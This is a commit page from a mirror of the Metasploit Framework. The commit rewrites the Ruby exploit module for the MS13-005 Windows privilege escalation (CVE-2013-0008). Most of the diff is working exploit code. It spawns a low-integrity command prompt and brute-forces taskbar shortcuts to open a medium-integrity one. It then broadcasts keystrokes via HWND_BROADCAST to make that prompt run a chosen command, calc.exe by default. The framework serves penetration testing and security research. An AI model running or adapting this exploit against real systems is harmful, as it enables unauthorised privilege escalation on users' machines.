infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add api constants and tidy

bug/bundler_fix
Meatballs 2013-07-26 01:48:39 +01:00
parent 0235e6803d
commit b99ad41a64
2 changed files with 89 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb
View File

@ -48,6 +48,7 @@ class ApiConstants
# Slurp in a giant list of known constants.
#
def self.add_constants(win_const_mgr)
win_const_mgr.add_const('HWND_BROADCAST',0x00000FFFF)
win_const_mgr.add_const('MCI_DGV_SETVIDEO_TINT',0x00004003)
win_const_mgr.add_const('EVENT_TRACE_FLAG_PROCESS',0x00000001)
win_const_mgr.add_const('TF_LBI_TOOLTIP',0x00000004)

120
modules/exploits/windows/local/ms13_005.rb
View File

@ -16,8 +16,19 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={})
super( update_info( info,
'Name' => 'MS13-005 Low Integrity to Medium Integrity Privilege Escalation',
'Name' => 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
'Description' => %q{
The Windows kernel does not properly isolate broadcast messages from low integrity
applications from medium or high integrity applications. This allows commands to be
broadcasted to an open medium or high integrity command prompts allowing escalation
of privileges. We can spawn a medium integrity command prompt, after spawning a low
integrity command prompt, by using the Win+Shift+# combination to specify the position
of the command prompt on the taskbar. We can then broadcast our command and hope that
the user is away and doesn't corrupt it by interracting with the UI.
Broadcast issue affects versions Windows Vista, 7, 8, Server 2008, Server 2008 R2,
Server 2012, RT. Spawning a command prompt with the shortcut key does not work in
Vista so you will have to check if the user is already running a command prompt
and set SPAWN_PROMPT false.
},
'License' => MSF_LICENSE,
'Author' =>
@ -34,9 +45,27 @@ class Metasploit3 < Msf::Exploit::Local
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate'=> "Nov 27 2912"
# References CVE-2013-0008
'DisclosureDate'=> "Nov 27 2012",
'References' =>
[
[ 'CVE', '2013-0008' ],
[ 'MSB', 'MS13-005' ],
[ 'OSVDB', '88966'],
[ 'URL', 'http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html' ]
]
))
register_options(
[
OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true])
], self.class
)
register_advanced_options(
[
OptBool.new('EEGG', [false, '',])
]
)
end
def win_shift(number)
@ -44,11 +73,13 @@ class Metasploit3 < Msf::Exploit::Local
bscan = 0x81 + number
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
sleep(0.01)
client.railgun.user32.keybd_event(vk, bscan, 0, 0)
sleep(0.01)
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
end
def count_cmd_procs
@ -58,48 +89,67 @@ class Metasploit3 < Msf::Exploit::Local
count += 1
end
end
puts count
vprint_status("Cmd prompt count: #{count}")
return count
end
# Run Method for when run command is issued
def cleanup
if datastore['SPAWN_PROMPT']
vprint_status("Rehiding window...")
client.railgun.user32.ShowWindow(@hwin, 0)
end
end
def exploit
@payload_name = datastore['PAYLOAD']
@payload_arch = framework.payloads.create(@payload_name).arch
# syinfo is only on meterpreter sessions
e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg=="
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
hwin = client.railgun.kernel32.GetConsoleWindow()['return']
if hwin == nil
hwin = client.railgun.user32.GetForegroundWindow()['return']
if datastore['SPAWN_PROMPT']
@hwin = client.railgun.kernel32.GetConsoleWindow()['return']
if @hwin == nil
@hwin = client.railgun.user32.GetForegroundWindow()['return']
end
#client.railgun.user32.ShowWindow(@hwin, 0)
#client.railgun.user32.ShowWindow(@hwin, 5)
# Spawn low integrity cmd.exe
print_status("Spawning Low Integrity Cmd Prompt")
windir = client.fs.file.expand_path("%windir%")
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs
spawned = false
# Bruteforce taskbar position Win+Shift+?
print_status("Bruteforcing Taskbar Position")
9.downto(1) do |number|
vprint_status("Attempting Win+Shift+#{number}")
win_shift(number)
sleep(1)
if count_cmd_procs > count
print_good("Spawned Medium Integrity Cmd Prompt")
spawned = true
break
end
end
client.sys.process.kill(li_cmd_pid)
fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned
end
puts client.railgun.user32.ShowWindow(hwin, 0)
puts client.railgun.user32.ShowWindowAsync(hwin, 5)
# Spawn low integrity cmd.exe
li_cmd_pid = client.sys.process.execute("cmd.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs
# Win+Shift+?
number = 0
begin # Ruby DoWhile!
i = (9 - number)
win_shift(number)
number += 1
sleep(1)
end while count_cmd_procs == count and number <= 9
print_status "Spawned!!!"
client.sys.process.kill(li_cmd_pid)
payload = "calc.exe"
hwnd_broadcast = 0xffff
wm_char = 0x0102
print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
payload = Rex::Text.decode_base64(e) if datastore['EEGG']
payload.each_char do |c|
client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, c.unpack('c').first, 0)
print c
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
sleep(0.01)
end
client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, 'VK_RETURN', 0)
print_line
print_status("Executing command...")
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
end
end